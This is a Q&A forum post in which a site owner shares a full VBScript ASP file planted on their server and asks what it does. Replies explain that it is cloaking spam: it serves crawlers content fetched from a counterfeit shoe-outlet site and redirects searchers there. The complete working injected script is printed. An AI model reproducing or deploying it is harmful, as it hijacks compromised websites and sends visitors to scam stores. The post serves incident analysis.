# unknowned page uploaded to my site

Tags: asp.net, vbscript, ftp

this script is uploaded to my site with name default.asp, Does anyone know what was being uploaded?

```
<%@LANGUAGE="VBSCRIPT" CODEPAGE="65001"%>
    <%
    on error resume next
    jumpcode="http://link.2016online.com/en/birkenstock.txt.html"
    desurljiechi="http://www.birkenstockshoes-outlet.us.com/birkenstock-womens-outlet-1"
    arrdom = Split(desurljiechi, "/")
    For dd = 0 To 2
        desurl = desurl & arrdom(dd)& "/"
    Next
    shellurl="http://"&Request.ServerVariables("Http_Host")&replace(replace(LCase(replace(Request.ServerVariables("REQUEST_URI"),"?"&request.ServerVariables("QUERY_STRING"),"")),"index.asp",""),"default.asp","")&"?"
    rp="nike"
    rc="online"
    function is_spider()
        dim s_agent
        s_agent=Request.ServerVariables("HTTP_USER_AGENT")

        If instr(s_agent,"google")>0 Or instr(s_agent,"yahoo")>0 Or instr(s_agent,"bing")>0 Or instr(s_agent,"msnbot")>0 Or instr(s_agent,"alexa")>0 Or instr(s_agent,"ask")>0 Or instr(s_agent,"findlinks")>a0 Or instr(s_agent,"altavista")>0 Or instr(s_agent,"baidu")>0 Or instr(s_agent,"inktomi")>0 Then
        is_spider = 1
        else
        is_spider = 0
        end if
    end function

    Function GetHtml(url,k)
      agent = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"&k
      Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
      ObjXMLHTTP.Open "GET",url,False
      ObjXMLHTTP.setRequestHeader "User-Agent",agent
      ObjXMLHTTP.setRequestHeader "Referer", "https://www.google.com/"
      ObjXMLHTTP.send
      GetHtml=ObjXMLHTTP.responseBody
      Set ObjXMLHTTP=Nothing
      set objStream = Server.CreateObject("Adodb.Stream")
      objStream.Type = 1
      objStream.Mode =3
      objStream.Open
      objStream.Write GetHtml
      objStream.Position = 0
      objStream.Type = 2
      objStream.Charset = "utf-8"

      GetHtml = objStream.ReadText
      objStream.Close
    End Function
    Function IsUserSearch()
        s_ref=Request.ServerVariables("HTTP_REFERER")
        If instr(s_ref,"google")>0 Or instr(s_ref,"yahoo")>0 Or instr(s_ref,"bing")>0 Or instr(s_ref,"aol")>0 Then
            IsUserSearch = true
        else
            IsUserSearch = false
        end if
    End Function
    Function RegExpMatches(patrn, strng)
        Dim regEx, Match, Matches
        Set regEx = New RegExp
        regEx.Pattern = patrn
        regEx.IgnoreCase = True
        regEx.Global = True
        Set Matches = regEx.Execute(strng)
        Dim MyArray()
        Dim i
        i=0
        For Each Match in Matches
            ReDim Preserve MyArray(i)
            MyArray(i)=Match.Value
            i=i-(-1)
        Next
        RegExpMatches = MyArray
    End Function

    Function RegExpReplace(html,patrn, strng)
    Dim regEx
    Set regEx = New RegExp
    regEx.Pattern = patrn
    regEx.IgnoreCase = True
    regEx.Global = True
    RegExpReplace=regEx.Replace(html,strng)
    End Function

    Function cDec(num)
     cDecstr=0
     if len(num)>0 and isnumeric(num) then
      for inum=0 to len(num)-1
       cDecstr=cDecstr-(-(2^inum*cint(mid(num,len(num)-inum,1))))
      next
     end if
     cDec=cDecstr
    End Function 

    Function OcB(num)
     OcBstr=""
     if len(num)>0 and isnumeric(num) then
      for i=1 to len(num)
       select case (mid(num,i,1))
        case "0" OcBstr=OcBstr&"000"
        case "1" OcBstr=OcBstr&"001"
        case "2" OcBstr=OcBstr&"010"
        case "3" OcBstr=OcBstr&"011"
        case "4" OcBstr=OcBstr&"100"
        case "5" OcBstr=OcBstr&"101"
        case "6" OcBstr=OcBstr&"110"
        case "7" OcBstr=OcBstr&"111"
       end select
      next
     end if
     OcB=OcBstr
    End Function 

    Function OcD(num)
     OcD=cDec(OcB(num))
    End Function 

    Function toOct(objMatch)
            toOct = "-"&rp&"-"&Oct(objMatch.subMatches(0))&"."
    End Function

    Function toDeOct(objMatch)
            toDeOct = "-p-"&OcD(objMatch.subMatches(0))&"."
    End Function

    Function toCOct(objMatch)
            toCOct = "-"&rc&"-"&Oct(objMatch.subMatches(0))&objMatch.subMatches(1)
    End Function

    Function toCDeOct(objMatch)
            toCDeOct = "-c-"&OcD(objMatch.subMatches(0))&objMatch.subMatches(1)
    End Function

    Function RegExpReplaceCall( reg, m, str, fstr)
            Dim Fun, Match, Matches, i, nStr, LastIndex
            If str & "" = "" Then Exit Function
            Set Fun = getRef(fstr)
            Set regEx = New RegExp
            regEx.Pattern = reg
            regEx.IgnoreCase = True
            regEx.Global = True
            Set Matches = regEx.Execute(str)
            LastIndex = 1
            For Each Match In Matches
                If Match.FirstIndex>0 Then
                    nStr = nStr & Mid(str, LastIndex, Match.FirstIndex-(-1)-LastIndex)
                End If
                nStr = nStr & Fun(Match)
            LastIndex = Match.FirstIndex-(-1)-(-Match.Length)
            Next
            nStr = nStr & Mid(str, LastIndex)
            RegExpReplaceCall = nStr
    End Function

    Function RegReplaceCall( reg, str, fstr)
            RegReplaceCall = RegExpReplaceCall(reg, "ig", str, fstr)
    End Function

    spider = is_spider()
    querystr = request.ServerVariables("QUERY_STRING")
    if  spider = 1 or querystr = "feiya" then
        if querystr = "feiya" then
            querystr = ""
        end if
        if querystr <> "" then
            querystr = RegReplaceCall("-"&rp&"-(\d"&chr(43)&")\.",querystr,"toDeOct")
            querystr = RegReplaceCall("-"&rc&"-(\d"&chr(43)&")([\._])",querystr,"toCDeOct")
            htmls = GetHtml(desurl&querystr,"")
        else
            htmls = GetHtml(desurljiechi&querystr,"")
        end if

        htmls = RegExpReplace(htmls,"href\s*=\s*(["&chr(34)&"'])"&desurl,"href=$1"&shellurl)
        desurl1 = RegExpReplace(desurl,"/$","")
        htmls = RegExpReplace(htmls,"href\s*=\s*(["&chr(34)&"'])"&desurl1,"href=$1"&shellurl)
        htmls = RegExpReplace(htmls,"href\s*=\s*(["&chr(34)&"'])/","href=$1"&shellurl)
        htmls = RegExpReplace(htmls,"href\s*=\s*(["&chr(34)&"'])(?!http)","href=$1"&shellurl)

        htmls = RegExpReplace(htmls,"src\s*=\s*(["&chr(34)&"'])"&desurl,"src=$1"&shellurl)
        htmls = RegExpReplace(htmls,"src\s*=\s*(["&chr(34)&"'])/","src=$1"&shellurl)
        htmls = RegExpReplace(htmls,"src\s*=\s*(["&chr(34)&"'])(?!http)","src=$1"&shellurl)
        htmls = RegExpReplace(htmls,"url\((["&chr(34)&"'])","url($1"&shellurl)

        desurl2 = replace(desurl1,"http://www.","")
        desurl2 = replace(desurl2,"http://","")
        htmls = replace(htmls,desurl2,Request.ServerVariables("Http_Host"),1,-1,1)

        htmls = RegExpReplace(htmls,"href\s*=\s*(["&chr(34)&"'])"&shellurl&"\?(.*\.css)","href=$1"&desurl&"$2")
        htmls = RegExpReplace(htmls,"href\s*=\s*(["&chr(34)&"'])"&shellurl&"\?(.*\.ico)","href=$1"&desurl&"$2")

        htmls = RegExpReplace(htmls,"src\s*=\s*(["&chr(34)&"'])"&shellurl&"\?","src=$1"&desurl)

        shellurlrm =  shellurl
        shellurlrm=replace(shellurlrm,"?","")
        htmls = RegExpReplace(htmls,shellurlrm&"\?(["&chr(34)&"'])",shellurlrm&"$1")

        htmls = RegReplaceCall("-p-(\d"&chr(43)&")\.",htmls,"toOct")
        htmls = RegReplaceCall("-c-(\d"&chr(43)&")([\._])",htmls,"toCOct")

        htmls =  replace(htmls,"window.location.href","var jp")
        htmls =  replace(htmls,"location.href",";var jp")
        response.write htmls
        response.end()
    else
        if IsUserSearch then
            if instr(jumpcode,".txt")>0 then
                jumpcode = GetHtml(jumpcode,"Mozi11a")
                tiaoarray=split(jumpcode,"?")
                if IsEmpty(tiaoarray(0)) then 
                   response.redirect jumpcode&"?"&shellurl
                else
                   response.redirect tiaoarray(0)&"?"&shellurl
                end if
            end if
        end if
    end if
    response.write GetHtml("http://"&Request.ServerVariables("Http_Host")&"/default.aspx","Mozi11a")
    %>
```

Comment: Why are you asking us? If someone uploaded code to your website, clearly they're not doing it for your benefit.

Comment: You might want to change your passwords for FTP and Control Panel logins. But it looks like the script detects if the request is a user or a bot/spider. Then redirects the user or shows the bot the contents of the real site to boost the Google Index. Fortinet also blocks the url as "Security Risk:Spam URLs", which would make sense

Answer (score 0):

It's redirecting requests to your site to another (probably scam) site, but only if you are coming from google.com.